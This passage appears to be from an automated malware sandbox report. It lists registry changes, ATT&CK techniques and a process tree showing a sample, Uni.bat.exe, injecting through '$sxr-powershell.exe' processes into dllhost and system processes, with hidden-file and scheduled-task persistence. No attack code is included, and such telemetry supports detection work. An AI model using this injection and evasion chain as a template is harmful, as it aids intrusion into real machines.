Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732815183"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe

Modifies registry class 24 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3495501434-311648039-2993076821-1000\{D8F47308-FD51-4EA4-9F60-11CCBCB489C9}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3495501434-311648039-2993076821-1000\{ADD20EE9-867D-4F38-B874-4F3D65BEE705}	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3495501434-311648039-2993076821-1000\{378A2B84-06DE-4C7A-8F5E-3BD91D87E9F8}	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3495501434-311648039-2993076821-1000\{80025C6E-9D2E-4121-AC9F-A414B62B98A8}	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
5728	PING.EXE
6072	PING.EXE
2216	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3476	Uni.bat.exe
3476	Uni.bat.exe
3476	Uni.bat.exe
4540	dllhost.exe
4540	dllhost.exe
4540	dllhost.exe
4540	dllhost.exe
3476	Uni.bat.exe
3476	Uni.bat.exe
1136	$sxr-powershell.exe
1136	$sxr-powershell.exe
1136	$sxr-powershell.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
1136	$sxr-powershell.exe
1136	$sxr-powershell.exe
3724	$sxr-powershell.exe
3724	$sxr-powershell.exe
3724	$sxr-powershell.exe
3724	$sxr-powershell.exe
4144	$sxr-powershell.exe
4144	$sxr-powershell.exe
3392	$sxr-powershell.exe
4144	$sxr-powershell.exe
4144	$sxr-powershell.exe
3392	$sxr-powershell.exe
3392	$sxr-powershell.exe
3392	$sxr-powershell.exe
2140	$sxr-powershell.exe
2140	$sxr-powershell.exe
1540	$sxr-powershell.exe
1540	$sxr-powershell.exe
1540	$sxr-powershell.exe
2140	$sxr-powershell.exe
3764	$sxr-powershell.exe
3764	$sxr-powershell.exe
1540	$sxr-powershell.exe
1540	$sxr-powershell.exe
3764	$sxr-powershell.exe
2140	$sxr-powershell.exe
2140	$sxr-powershell.exe
3764	$sxr-powershell.exe
3764	$sxr-powershell.exe
5076	$sxr-powershell.exe
5076	$sxr-powershell.exe
5076	$sxr-powershell.exe
4556	$sxr-powershell.exe
4556	$sxr-powershell.exe
5076	$sxr-powershell.exe
5076	$sxr-powershell.exe
4556	$sxr-powershell.exe
4556	$sxr-powershell.exe
4556	$sxr-powershell.exe
1932	$sxr-powershell.exe
1932	$sxr-powershell.exe
1932	$sxr-powershell.exe
1932	$sxr-powershell.exe
1932	$sxr-powershell.exe
1340	$sxr-powershell.exe
1340	$sxr-powershell.exe
1136	$sxr-powershell.exe
1136	$sxr-powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3476	Uni.bat.exe
Token: SeDebugPrivilege	3476	Uni.bat.exe
Token: SeDebugPrivilege	4540	dllhost.exe
Token: SeDebugPrivilege	1136	$sxr-powershell.exe
Token: SeDebugPrivilege	1136	$sxr-powershell.exe
Token: SeDebugPrivilege	2220	dllhost.exe
Token: SeDebugPrivilege	3724	$sxr-powershell.exe
Token: SeDebugPrivilege	4144	$sxr-powershell.exe
Token: SeDebugPrivilege	3392	$sxr-powershell.exe
Token: SeDebugPrivilege	2140	$sxr-powershell.exe
Token: SeDebugPrivilege	1540	$sxr-powershell.exe
Token: SeDebugPrivilege	3764	$sxr-powershell.exe
Token: SeDebugPrivilege	5076	$sxr-powershell.exe
Token: SeDebugPrivilege	4556	$sxr-powershell.exe
Token: SeDebugPrivilege	1932	$sxr-powershell.exe
Token: SeDebugPrivilege	1340	$sxr-powershell.exe
Token: SeDebugPrivilege	1136	$sxr-powershell.exe
Token: SeDebugPrivilege	2044	dllhost.exe
Token: SeShutdownPrivilege	888	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	888	mousocoreworker.exe
Token: SeShutdownPrivilege	888	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	888	mousocoreworker.exe
Token: SeShutdownPrivilege	3104	RuntimeBroker.exe
Token: SeAssignPrimaryTokenPrivilege	2288	svchost.exe
Token: SeIncreaseQuotaPrivilege	2288	svchost.exe
Token: SeSecurityPrivilege	2288	svchost.exe
Token: SeTakeOwnershipPrivilege	2288	svchost.exe
Token: SeLoadDriverPrivilege	2288	svchost.exe
Token: SeSystemtimePrivilege	2288	svchost.exe
Token: SeBackupPrivilege	2288	svchost.exe
Token: SeRestorePrivilege	2288	svchost.exe
Token: SeShutdownPrivilege	2288	svchost.exe
Token: SeSystemEnvironmentPrivilege	2288	svchost.exe
Token: SeUndockPrivilege	2288	svchost.exe
Token: SeManageVolumePrivilege	2288	svchost.exe
Token: SeAuditPrivilege	2280	svchost.exe
Token: SeAuditPrivilege	2920	svchost.exe
Token: SeAuditPrivilege	2920	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2288	svchost.exe
Token: SeIncreaseQuotaPrivilege	2288	svchost.exe
Token: SeSecurityPrivilege	2288	svchost.exe
Token: SeTakeOwnershipPrivilege	2288	svchost.exe
Token: SeLoadDriverPrivilege	2288	svchost.exe
Token: SeSystemtimePrivilege	2288	svchost.exe
Token: SeBackupPrivilege	2288	svchost.exe
Token: SeRestorePrivilege	2288	svchost.exe
Token: SeShutdownPrivilege	2288	svchost.exe
Token: SeSystemEnvironmentPrivilege	2288	svchost.exe
Token: SeUndockPrivilege	2288	svchost.exe
Token: SeManageVolumePrivilege	2288	svchost.exe
Token: SeShutdownPrivilege	1076	dwm.exe
Token: SeCreatePagefilePrivilege	1076	dwm.exe
Token: SeAssignPrimaryTokenPrivilege	2288	svchost.exe
Token: SeIncreaseQuotaPrivilege	2288	svchost.exe
Token: SeSecurityPrivilege	2288	svchost.exe
Token: SeTakeOwnershipPrivilege	2288	svchost.exe
Token: SeLoadDriverPrivilege	2288	svchost.exe
Token: SeSystemtimePrivilege	2288	svchost.exe
Token: SeBackupPrivilege	2288	svchost.exe
Token: SeRestorePrivilege	2288	svchost.exe
Token: SeShutdownPrivilege	2288	svchost.exe
Token: SeSystemEnvironmentPrivilege	2288	svchost.exe
Token: SeUndockPrivilege	2288	svchost.exe
Token: SeManageVolumePrivilege	2288	svchost.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe

Suspicious use of SendNotifyMessage 22 IoCs

pid	Process
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
3160	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe
5128	explorer.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1136	$sxr-powershell.exe
5720	Conhost.exe
5316	Conhost.exe
5376	TextInputHost.exe
5272	StartMenuExperienceHost.exe
5376	TextInputHost.exe
4500	StartMenuExperienceHost.exe
2052	SearchApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 560 wrote to memory of 3476	560	cmd.exe	83
PID 560 wrote to memory of 3476	560	cmd.exe	83
PID 3476 wrote to memory of 4540	3476	Uni.bat.exe	88
PID 3476 wrote to memory of 4540	3476	Uni.bat.exe	88
PID 3476 wrote to memory of 4540	3476	Uni.bat.exe	88
PID 3476 wrote to memory of 4540	3476	Uni.bat.exe	88
PID 3476 wrote to memory of 4540	3476	Uni.bat.exe	88
PID 3476 wrote to memory of 4540	3476	Uni.bat.exe	88
PID 3476 wrote to memory of 4540	3476	Uni.bat.exe	88
PID 3476 wrote to memory of 1136	3476	Uni.bat.exe	89
PID 3476 wrote to memory of 1136	3476	Uni.bat.exe	89
PID 1136 wrote to memory of 2220	1136	$sxr-powershell.exe	92
PID 1136 wrote to memory of 2220	1136	$sxr-powershell.exe	92
PID 1136 wrote to memory of 2220	1136	$sxr-powershell.exe	92
PID 1136 wrote to memory of 2220	1136	$sxr-powershell.exe	92
PID 1136 wrote to memory of 2220	1136	$sxr-powershell.exe	92
PID 1136 wrote to memory of 2220	1136	$sxr-powershell.exe	92
PID 1136 wrote to memory of 2220	1136	$sxr-powershell.exe	92
PID 1136 wrote to memory of 3724	1136	$sxr-powershell.exe	94
PID 1136 wrote to memory of 3724	1136	$sxr-powershell.exe	94
PID 1136 wrote to memory of 4144	1136	$sxr-powershell.exe	95
PID 1136 wrote to memory of 4144	1136	$sxr-powershell.exe	95
PID 1136 wrote to memory of 3392	1136	$sxr-powershell.exe	96
PID 1136 wrote to memory of 3392	1136	$sxr-powershell.exe	96
PID 1136 wrote to memory of 2140	1136	$sxr-powershell.exe	97
PID 1136 wrote to memory of 2140	1136	$sxr-powershell.exe	97
PID 1136 wrote to memory of 1540	1136	$sxr-powershell.exe	98
PID 1136 wrote to memory of 1540	1136	$sxr-powershell.exe	98
PID 1136 wrote to memory of 3764	1136	$sxr-powershell.exe	99
PID 1136 wrote to memory of 3764	1136	$sxr-powershell.exe	99
PID 1136 wrote to memory of 5076	1136	$sxr-powershell.exe	100
PID 1136 wrote to memory of 5076	1136	$sxr-powershell.exe	100
PID 1136 wrote to memory of 4556	1136	$sxr-powershell.exe	101
PID 1136 wrote to memory of 4556	1136	$sxr-powershell.exe	101
PID 1136 wrote to memory of 1932	1136	$sxr-powershell.exe	102
PID 1136 wrote to memory of 1932	1136	$sxr-powershell.exe	102
PID 1136 wrote to memory of 1340	1136	$sxr-powershell.exe	103
PID 1136 wrote to memory of 1340	1136	$sxr-powershell.exe	103
PID 1136 wrote to memory of 2044	1136	$sxr-powershell.exe	104
PID 1136 wrote to memory of 2044	1136	$sxr-powershell.exe	104
PID 1136 wrote to memory of 2044	1136	$sxr-powershell.exe	104
PID 1136 wrote to memory of 2044	1136	$sxr-powershell.exe	104
PID 1136 wrote to memory of 2044	1136	$sxr-powershell.exe	104
PID 1136 wrote to memory of 2044	1136	$sxr-powershell.exe	104
PID 1136 wrote to memory of 2044	1136	$sxr-powershell.exe	104
PID 1136 wrote to memory of 2044	1136	$sxr-powershell.exe	104
PID 1136 wrote to memory of 2044	1136	$sxr-powershell.exe	104
PID 2044 wrote to memory of 624	2044	dllhost.exe	5
PID 2044 wrote to memory of 684	2044	dllhost.exe	7
PID 2044 wrote to memory of 960	2044	dllhost.exe	12
PID 2044 wrote to memory of 412	2044	dllhost.exe	13
PID 2044 wrote to memory of 436	2044	dllhost.exe	14
PID 2044 wrote to memory of 732	2044	dllhost.exe	15
PID 2044 wrote to memory of 1000	2044	dllhost.exe	16
PID 2044 wrote to memory of 1076	2044	dllhost.exe	17
PID 2044 wrote to memory of 1104	2044	dllhost.exe	18
PID 2044 wrote to memory of 1180	2044	dllhost.exe	19
PID 2044 wrote to memory of 1252	2044	dllhost.exe	20
PID 2044 wrote to memory of 1272	2044	dllhost.exe	21
PID 2044 wrote to memory of 1360	2044	dllhost.exe	23
PID 2044 wrote to memory of 1408	2044	dllhost.exe	24
PID 2044 wrote to memory of 1420	2044	dllhost.exe	25
PID 2044 wrote to memory of 1524	2044	dllhost.exe	26
PID 2044 wrote to memory of 1564	2044	dllhost.exe	27

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5632	attrib.exe
5752	attrib.exe
5832	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1076
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{24c869e8-a2a3-48b3-8fd5-d2cdb7168a09}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{46764361-e156-4387-8588-aedc3b4c0936}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2220
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{72b1edd5-1a84-460b-aca0-910200906fca}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2044
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{57c575f3-2f87-4464-88dc-1c2d9bb968f5}
  2⤵
  PID:1636
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9fdd3ef3-f3ee-481a-a065-ff66697c082e}
  2⤵
  PID:3136
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9d2f9405-64cc-4d55-97bf-13be11e2c231}
  2⤵
  PID:5476
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cd8ad107-2460-49f5-8d40-bbf7c081468a}
  2⤵
  PID:1668
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4fbb84a0-dc40-474e-ae34-0ee46bdfe0ea}
  2⤵
  PID:2324
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5128
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:4036
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2472
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:5848
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:1572
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:4328
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:1520
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:5300
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:5168

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:412

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1252
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1524
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1940

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2072

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2208

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:3012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:3028

C:\Windows\system32\svchost.exe
